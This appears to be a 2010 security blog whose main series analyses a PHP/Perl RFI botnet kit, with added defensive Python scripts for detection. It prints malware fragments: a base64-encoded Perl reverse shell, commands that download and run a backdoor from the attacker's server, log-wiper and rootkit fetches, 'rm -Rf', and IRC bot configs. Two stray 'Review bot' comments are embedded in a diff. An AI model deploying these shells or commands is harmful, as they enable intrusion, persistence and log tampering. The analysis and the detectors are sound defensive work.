Irregular Expressions


August 22, 2010  9:44 PM

Casper RFI crack bot – Part 5

Dan O'Connor

Some of the sh.txt script seems to be pretty old: it calls out to milw0rm and darkc0de, and neither site is still up (nor has been for a while).

There are also a few things worth looking into here. The script mentions fx29shell.php, which is a PHP shell that can be loaded onto the system.

It can do all kinds of nasty things to your web server; downloading /etc/passwd is just the start. It is not good if you find this on your system, and it might be a good time to do some Google searches against your domain (while we are talking about it).

So after all of this it looks like casper.(pl|txt) is the main thing doing all of the work, as you can tell from all of the variables.

$admin       = "XXXXX";
$serverircs  = array("irc.xxxxx.xxx");
$serverirc   = $serverircs[rand(0,count($serverircs) - 1)];
$urldata     = "http://xxxxxxx/xxxxxxx/casper/";
$injektor    = "sh.txt";
$defacer     = "def.txt";
$filepsy     = "psy.tar.gz";
$portpsy     = "6667";
$fileggdrop  = "eggdrop.tar.gz";
$filebotphp  = "bot.txt";
$crbots      = 2;
$filebotperl = "iso.txt";
$filebotscan = "scan.txt";

In the next section we will take a closer look at casper, now that we have poked around a bit.

August 21, 2010  12:26 AM

Casper RFI crack bot – Part 4


sh.txt

This one also looks juicy!

Another PHP file:

<?php
$sh_id = "Q2FTcEVyX0thRUB5YWhPTy5jT20=";
$sh_ver = "0.0 01.01.2010";
$sh_name = base64_decode($sh_id).$sh_ver;
$sh_mainurl = "http://xxxxxx.ru/config/";
$html_start = ''.
'<html><head>
<title>'.getenv("HTTP_HOST").' - '.$sh_name.'</title>
<style type="text/css">
<!--

What are you up to with this one?

We have lots of toys to play with.

//Authentication
$login = "";
$pass = "";
$md5_pass = ""; //Password already encrypted with md5. If empty, md5($pass).
$host_allow = array("*"); //Example: array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted Area"; //HTTP-Auth message
$accessdeniedmess = "<a href=\"$sh_mainurl\">".$sh_name."</a>: access denied";
$gzipencode = TRUE;
$updatenow = FALSE; //If TRUE, update the shell now.
$c99sh_updateurl = $sh_mainurl."fx29sh_update.php";
$c99sh_sourcesurl = $sh_mainurl."fx29sh_source.txt";
//$c99sh_updateurl = "http://localhost/toolz/fx29sh_update.php";
//$c99sh_sourcesurl = "http://localhost/toolz/fx29sh_source.txt";
$filestealth = TRUE; //TRUE: do not change modification and access times.
$curdir = "./";
$tmpdir = "";
$tmpdir_log = "./";
$log_email = "xxxxx_xxx@yahoo.com"; //email address the logs are sent to.
$sort_default = "0a"; //Sorting: 0 - column number, "a"scending or "d"escending
$sort_save = TRUE; //If TRUE, save the sort position using cookies.
$sess_cookie = "c99shvars"; //Cookie variable name
$usefsbuff = TRUE; //Buffer-function
$copy_unset = FALSE; //Delete the copied file after it is pasted
$hexdump_lines = 8;
$hexdump_rows = 24;
$win = strtolower(substr(PHP_OS,0,3)) == "win";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc)) {
  $disablefunc = str_replace(" ","",$disablefunc);
  $disablefunc = explode(",",$disablefunc);
}

Then come a few functions for checking and reporting disk usage.

Now this is worth tracking down.

//milw0rm search
$Lversion = php_uname('r');   // kernel release string
$OSV = php_uname('s');        // OS name ("Linux", "FreeBSD", ...)
if(eregi("Linux",$OSV)) {     // eregi() is the old POSIX regex function, removed in PHP 7
  $Lversion=substr($Lversion,0,6);
  $millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
} else {
  $Lversion=substr($Lversion,0,3);
  $millink ="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
}
//End of milw0rm search

I wish milw0rm was still around so we could see what those are for :(

Here are a few things that are encoded.

$back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7
DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0k
QVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGll
KCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsN
CmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+
JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3Rl
bSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4i
Ow0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

And a few others, no point in sharing :)
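Finding one of these shells on a web server is the defender's problem, so here is an added example (my code, not code from the post or from fx29shell) of a static triage script: it flags PHP files that contain the config markers quoted above (`c99shvars`, `fx29sh_update.php`, `$sh_mainurl`, `$back_connect_pl`, the milw0rm search URL) and decodes any long base64 literal to see whether it hides an embedded script, which is what `$back_connect_pl` above turns out to be. The sample file it scans is constructed here; the base64 inside it is a harmless one-line Perl script built for the test, not the blob from the post.

```python
import base64
import binascii
import re

# Indicator strings taken from the fx29shell/c99 config quoted in the post.
SHELL_MARKERS = (
    "c99shvars",
    "fx29sh_update.php",
    "fx29sh_source.txt",
    "$sh_mainurl",
    "$c99sh_updateurl",
    "$back_connect_pl",
    "milw0rm.com/search.php",
)

# A double-quoted base64 literal long enough to hold a script, not a short token.
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{40,}={0,2})"')


def decode_if_script(literal):
    """Return the first line of the decoded literal if it looks like an
    embedded script (shebang or PHP open tag), otherwise None."""
    try:
        raw = base64.b64decode(literal, validate=True)
    except binascii.Error:
        return None
    text = raw.decode("utf-8", errors="replace")
    if text.startswith("#!") or text.lstrip().startswith("<?php"):
        return text.splitlines()[0]
    return None


def scan_php_source(source):
    """Static triage of one PHP file: which shell markers it contains and
    which base64 literals decode to a script. Nothing is executed."""
    markers = [m for m in SHELL_MARKERS if m in source]
    embedded = []
    for literal in B64_LITERAL.findall(source):
        head = decode_if_script(literal)
        if head is not None:
            embedded.append(head)
    return {
        "markers": markers,
        "embedded_scripts": embedded,
        "suspicious": bool(markers) or bool(embedded),
    }


# Constructed sample, not the real sh.txt: three config lines in the shape of
# the post's excerpt plus a base64 literal built from a harmless perl one-liner.
CONSTRUCTED_PERL_B64 = base64.b64encode(
    b"#!/usr/bin/perl\nprint \"constructed sample\\n\";\n"
).decode()
SAMPLE_SHELL = (
    '<?php\n'
    '$sess_cookie = "c99shvars";\n'
    '$c99sh_updateurl = $sh_mainurl."fx29sh_update.php";\n'
    '$back_connect_pl = "' + CONSTRUCTED_PERL_B64 + '";\n'
)
# Constructed benign file for comparison.
SAMPLE_CLEAN = '<?php\n$title = "Hello";\necho $title;\n'

if __name__ == "__main__":
    for name, src in (("shell", SAMPLE_SHELL), ("clean", SAMPLE_CLEAN)):
        print(name, scan_php_source(src))
```

The decode step only looks at the first line of whatever the base64 hides, which is enough to tell a shebang or `<?php` from an image or a compressed blob; the point is to triage without running anything from the file.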

We sure are reporting back on a lot of things.

  $cmdaliases = array(
    array("", "ls -al"),
    array("Find all suid files", "find / -type f -perm -04000 -ls"),
    array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
    array("Find all sgid files", "find / -type f -perm -02000 -ls"),
    array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
    array("Find config.inc.php files", "find / -type f -name config.inc.php"),
    array("Find config* files", "find / -type f -name \"config*\""),
    array("Find config* files in current dir", "find . -type f -name \"config*\""),
    array("Find all writable folders and files", "find / -perm -2 -ls"),
    array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
    array("Find all writable folders", "find / -type d -perm -2 -ls"),
    array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
    array("Find all service.pwd files", "find / -type f -name service.pwd"),
    array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
    array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
    array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
    array("Find all .bash_history files", "find / -type f -name .bash_history"),
    array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
    array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
    array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
    array("List file attributes on a Linux second extended file system", "lsattr -va"),
    array("Show opened ports", "netstat -an | grep -i listen")
  );

OK now this is nice!

  $cmdaliases2 = array(
    array("wget & extract psyBNC","wget ".$sh_mainurl."fx.tar.gz;tar -zxf fx.tar.gz"),
    array("wget & extract EggDrop","wget ".$sh_mainurl."fxb.tar.gz;tar -zxf fxb.tar.gz"),
    array("-----",""),
    array("Logged in users","w"),
    array("Last to connect","lastlog"),
    array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
    array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
    array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
    array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
    array("CPU Info","cat /proc/version /proc/cpuinfo"),
    array("Is gcc installed ?","locate gcc"),
    array("Format box (DANGEROUS)","rm -Rf"),
    array("-----",""),
    array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
    array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
    array("Run WIPELOGS PT3","./zap2"),
    array("-----",""),
    array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
    array("wget & run BindDoor","wget ".$sh_mainurl."toolz/bind.tar.gz;tar -zxvf bind.tar.gz;./4877"),
    array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
  );

It looks for a few more things: it pulls down log wipers from packetstorm, grabs RatHole 1.2 from the same place, and fetches a local sudo exploit.

This is a big one, I will have to continue this tomorrow.


August 21, 2010  12:12 AM

Casper RFI crack bot – Part 3


iso.txt is looking promising for a peek.

#!/usr/bin/perl
#
#  ShellBOT by: XXXXXXXXXXXX
#       Greetz: XXXXXXXXXXXXXX
#
# Commands:
#           @oldpack <ip> <bytes> <time>;
#           @udp <ip> <port> <time>;
#           @fullportscan <ip> <start port> <end port>;
#           @conback <ip> <port>
#           @download <url> <file to save as>;
#           !estatisticas <on/off>;
#           !sair to stop the bot;
#           !novonick to change the bot's nick to a new random one;
#           !entra <channel> <time>
#           !sai <channel> <time>;
#           !pacotes <on/off>
#           @info
#           @xpl <kernel>
#           @sendmail <subject> <sender> <recipient> <body>

I am liking this one already!

We also get more IRC servers.

$servidor='irc.xxxxx.xxx' unless $servidor;
my $porta='6667';
my @canais=("#xxxxxxx");
my @adms=("XXXXXX");

This is a good one: it logs into an IRC server, reports in and waits for commands.

Lots of goodies in here to go through, another one to come back and spend a little more time on.

There are yet a few more, and they seem to be getting better.


August 21, 2010  12:04 AM

Casper RFI crack bot – Part 2


There is more than one file in each rar that appears to be a copy of the bot. The differences are pretty minor.

scan.txt
-my @servers = ("irc.xxxx.org");
+my @servers = ("irc.xxxxxx.org","irc.xxxxxx.org");
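Review bot: this first hunk is shown without its @@ header, so the reader cannot tell which lines of scan.txt it covers or whether it is adjacent to the banner hunk below; including the header would make the diff reproducible. The substantive change is that the second copy adds a second entry to @servers, which is the line that matters for anyone building a block list from these samples.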

@@ -3,7 +3,7 @@
 ################################
 #  CASPER RFI CRACK Bot v1.1   #
 #  By Kiss_Me Alert jan 2010.  #
-#     Casper_kae@yahoo.com     #
+#     carisma2009@gmail.com    #
 ################################
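Review bot: the only line that changes in this hunk is the contact address in the banner, while the "CASPER RFI CRACK Bot v1.1" line is identical in both copies, so the version string alone will not distinguish the two samples; the two e-mail addresses are the better identifier for telling them apart.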

We also have a handful of IRC servers listed in the files, with connection information.  That could be fun but also a lot of trouble :)

 var $config = array("server"=>"irc.xxxxxx.org",
                     "port"=>"6667",
                     "pass"=>"xxxx",
                     "prefix"=>"vai",
                     "maxrand"=>"15",
                     "chan"=>"#xxxx",
                     "chan2"=>"",
                     "key"=>"",
                     "modes"=>"+p",
                     "password"=>"xxxxx",
                     "trigger"=>".",
                     "hostauth"=>"*" // * for any hostname (remember: /setvhost pucorp.org)
                     );
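The IRC server, port and channel are the pieces of these configs a defender actually needs, and they turn up in several layouts across the files: the `$serverircs`/`$urldata`/`$portpsy` variables of casper.txt in Part 5, the `$servidor`/`$porta`/`@canais` lines of iso.txt in Part 3, and the `var $config = array(...)` block above. Here is an added example (my code, not part of the bot or of the post) that pulls hostnames, URLs, channels and ports out of any of those shapes by working on the quoted string literals rather than on one specific variable name. The two sample files are constructed in the same shape as the quoted configs, with made-up hostnames.

```python
import re
from collections import defaultdict

# Quoted string literals ("..." or '...') in PHP or Perl source.
LITERAL = re.compile(r"""(["'])(.*?)\1""")
HOSTNAME = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.I)
URL = re.compile(r"^https?://", re.I)
CHANNEL = re.compile(r"^#\S+$")
# Port-carrying names seen in the posts: "port", $portpsy, $porta
PORT_KEYS = re.compile(r"\bport\w*\W*?['\"](\d{2,5})['\"]", re.I)
# Dotted file names that would otherwise pass as hostnames (fx.tar.gz etc.)
FILE_EXT = {"txt", "gz", "tar", "php", "pl", "rar", "jpg", "c"}


def looks_like_host(value):
    """Hostname shape, minus dotted file names."""
    if not HOSTNAME.match(value):
        return False
    return value.rsplit(".", 1)[-1].lower() not in FILE_EXT


def extract_iocs(source):
    """Pull hostnames, URLs, IRC channels and ports out of one bot script.
    Working on literals means the PHP array() layout and the Perl
    my @servers=(...) layout are handled the same way."""
    iocs = defaultdict(set)
    for _, value in LITERAL.findall(source):
        if URL.match(value):
            iocs["urls"].add(value)
            host = URL.sub("", value).split("/")[0]
            if looks_like_host(host):
                iocs["hosts"].add(host.lower())
        elif looks_like_host(value):
            iocs["hosts"].add(value.lower())
        elif CHANNEL.match(value):
            iocs["channels"].add(value)
    for port in PORT_KEYS.findall(source):
        iocs["ports"].add(int(port))
    return {k: sorted(v) for k, v in iocs.items()}


def extract_all(files):
    """Merge the IOCs from a {filename: source} mapping into one block list."""
    merged = defaultdict(set)
    for source in files.values():
        for kind, values in extract_iocs(source).items():
            merged[kind].update(values)
    return {k: sorted(v) for k, v in merged.items()}


# Constructed samples (made-up hostnames) in the shape of the quoted configs.
SAMPLES = {
    # PHP layout of casper.txt / bot.txt
    "casper.txt": '''<?php
$serverircs  = array("irc.example-c2.net");
$urldata     = "http://cdn.example-c2.net/images/casper/";
$portpsy     = "6667";
var $config = array("server"=>"irc.example-c2.org",
                    "port"=>"6667",
                    "chan"=>"#constructed",
                    "hostauth"=>"*");
''',
    # Perl layout of scan.txt / iso.txt
    "scan.txt": '''#!/usr/bin/perl
my @servers = ("irc.example-c2.net","irc.backup-c2.org");
$servidor='irc.example-c2.net' unless $servidor;
my $porta='7000';
my @canais=("#constructed2");
''',
}

if __name__ == "__main__":
    for kind, values in extract_all(SAMPLES).items():
        print(kind, values)
```

Run over a real rar's worth of files the merged hosts and ports go straight into an egress block or an IDS rule, and the channels into the IRC-monitoring notes; the file-extension deny list is there because the `$cmdaliases2` strings above contain names like fx.tar.gz that would otherwise look like hostnames.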

pucorp.org is worth looking at. Browsing there does not seem to do much, but there is hidden text! Spiffy.

wget --mirror pucorp.org

What is the text?

No idea; it does appear to be from multiple servers, but I am not sure at this point why it's being dumped in here. We will have to come back to this.

There are yet more scripts included in here; iso.txt is worth a look.


August 20, 2010  10:31 PM

Casper RFI crack bot – Part 1


If you saw the ISC today (isc.sans.edu), there is a posting about a Perl Unix bot making the rounds.

http://isc.sans.edu/diary.html?storyid=9430

There are signatures from Emerging Threats to detect the bot, if you need them. http://doc.emergingthreats.net/2011176

I have found a server with almost* everything intact so this should be interesting..

First I am going to start with the site. The one I found was something like this (I am not going to give the real URL; I have already informed them about this):

http://XXX.XXX/e107_images/casper/

Google found this pretty fast. I would have suspected that if you have that much control over a web server you would have started by editing robots.txt so no one can find your little prize. But then again, people can be lazy.

The casper dir has a lot of txt files in it, but if you go one level back you see something that's really nice.

-rw-r--r-- 1     2e107_images.rar
drwxr-xr-x 2     casper
-rw-r--r-- 1     e107_images.rar

Hmm, we have the dir named casper and two rars?

A little odd but not totally out of place; what's inside of these bad boys?

2e107_images.rar
bot.txt
casper2.txt
casper.txt
cmd_kod.txt
def.txt
eggdrop.tar.gz.tar
iso.txt
psy.tar.gz.tar
sat.txt
scan.pl
scan.txt
sh.txt

e107_images.rar
Ckrid1.txt
Ckrid2.txt
iso.txt
myid.jpg
nnee.pl
nnee.txt
php.jpg
scan2.txt
scan.txt

Ohh pay dirt!

Not only do we have one, but we have two and they seem to be from different sources. A little diff will let us know what is going on.

Only in 2: bot.txt
Only in 2: casper2.txt
Only in 2: casper.txt
Only in e: Ckrid1.txt
Only in e: Ckrid2.txt
Only in 2: cmd_kod.txt
Only in 2: def.txt
Only in 2: eggdrop.tar.gz.tar

This is good to know, we will have to come back to that tar.

Next post we will start going through the files and see what the deal is with these two rars.


August 16, 2010  5:21 PM

Good blog on iPhone / iPad hacking


http://blog.iphone-dev.org/

I wish I could link to the first article.  It talks about a patch that is out for non-early iPhone and iPod touch users, leaving the early ones with security holes, which they fixed; the fix can be applied through Cydia!

I really appreciate people that take their time to give back to the community.  You can test to make sure it has worked by going to jailbreakme.com; it should fail.

If you want to install Cydia, go to jailbreakme.com :) and run the web app. Then you can install the fix.


August 16, 2010  5:02 PM

The SQL CAST statement..


http://isc.sans.edu/diary.html?storyid=9397

I have played with this before; the most effective method I found of blocking these was looking for the CAST statement itself.

The statements, at least the ones that I was playing with, all had a "CAST", "SET", "VARCHAR", and "EXEC".  I found that some vendors seem to be looking for the HEX or some mix, because I made variations of the HEX over and over again until it made its way through with the same SELECT statement.  I found the best way to detect these events was to look for the "CAST" with the other markers; in my case there was no use for "CAST" in my network, so I just started to alert on all of that.

This is a good breakdown and decode; it's worth reading!
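To make the marker approach concrete, here is an added example (my code, not from the post or the ISC diary) that applies it to web server log lines: it URL-decodes each request, requires all four markers CAST, SET, VARCHAR and EXEC to be present as whole words regardless of case or spacing, and then decodes the hex argument of CAST() so the analyst can see the SQL that would have run. The three log lines are constructed; the hex in them encodes a harmless SELECT built for the test.

```python
import re
from urllib.parse import unquote_plus

# The keyword combination the post alerts on; hex content is deliberately ignored.
MARKERS = ("CAST", "SET", "VARCHAR", "EXEC")
HEX_IN_CAST = re.compile(r"CAST\s*\(\s*0x([0-9A-F]+)\s+AS", re.I)


def normalize(line):
    """URL-decode twice (payloads often arrive double-encoded, with + or %20
    for spaces) and collapse whitespace so spacing tricks do not matter."""
    text = unquote_plus(unquote_plus(line))
    return re.sub(r"\s+", " ", text)


def decode_hex_payload(hexstr):
    """Turn the 0x... argument of CAST() back into SQL text, or None if it
    is not valid hex. nvarchar payloads are UTF-16LE (every second byte NUL)."""
    try:
        raw = bytes.fromhex(hexstr)
    except ValueError:
        return None
    if len(raw) >= 2 and raw[1:2] == b"\x00":
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def inspect_request(line):
    """Return (is_cast_injection, decoded_payload_or_None) for one log line."""
    text = normalize(line)
    upper = text.upper()
    if not all(re.search(r"\b%s\b" % m, upper) for m in MARKERS):
        return False, None
    m = HEX_IN_CAST.search(text)
    payload = decode_hex_payload(m.group(1)) if m else None
    return True, payload


def scan_log(lines):
    """Run the check over every line; returns [(line_no, decoded_payload)]."""
    hits = []
    for n, line in enumerate(lines, 1):
        flagged, payload = inspect_request(line)
        if flagged:
            hits.append((n, payload))
    return hits


# Constructed test data: the hex below encodes a harmless SELECT, not a real payload.
CONSTRUCTED_SQL = "SELECT 'constructed sample payload'"
HEX = CONSTRUCTED_SQL.encode("ascii").hex().upper()
SAMPLE_LOG = [
    # the classic shape, spaces as %20
    '10.0.0.5 - - [16/Aug/2010:16:50:01 -0400] "GET /page.asp?id=1;DECLARE%20@S%20VARCHAR(4000);'
    f'SET%20@S=CAST(0x{HEX}%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1" 200 512',
    # same thing with mixed case, lowercase hex and + for spaces
    '10.0.0.6 - - [16/Aug/2010:16:51:13 -0400] "GET /page.asp?id=1;declare+@s+varchar(4000);'
    f'set+@s=cAsT(0x{HEX.lower()}+as+varchar(4000));exec(@s);-- HTTP/1.1" 200 512',
    # benign request that happens to contain one of the markers
    '10.0.0.7 - - [16/Aug/2010:16:52:40 -0400] "GET /search.asp?q=set+menu HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for line_no, payload in scan_log(SAMPLE_LOG):
        print(line_no, payload)
```

Matching on the four keywords rather than on the hex is what makes the check survive the re-encoded variants the post describes; the decode step is only there so the alert carries the actual statement instead of a wall of hex.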


August 16, 2010  4:55 PM

Security Reporting


Here is a useful link from isc.sans.edu on "The Seven Deadly Sins of Security Reporting":

http://isc.sans.edu/diary.html?storyid=9400

All of them are great points, but I think #1 is really important and one of the places where a lot of people can run into trouble.  Also #3 ties into that: everyone has a BlackBerry, but are they really available after hours with them, or do they get ignored?

Most of the other points are straightforward, but at the end of the day if you can't be reached or can't reach anyone, your vulnerabilities are problems you are going to need to work through.

Also after all of that work, reports are sent out on a secure channel, printed and left on a desk.

:)


August 12, 2010  12:38 PM

Part 2 of the Inj3ct0r facebook hack


Enjoy!

http://inj3ct0r.com/exploits/13403


August 12, 2010  12:35 PM

Cheque counterfeiting, old school problem with new toys!


This will be fully released at blackhat, but here is a link to what has been released.

http://news.cnet.com/8301-27080_3-20011885-245.html

They were using a network of infected machines and mules to have checks cashed and sent to Russia.  They used PPTP VPNs to move the information around and scraped job sites looking for people to mule the money, with fake job offers. They dubbed the network "Big Boss".

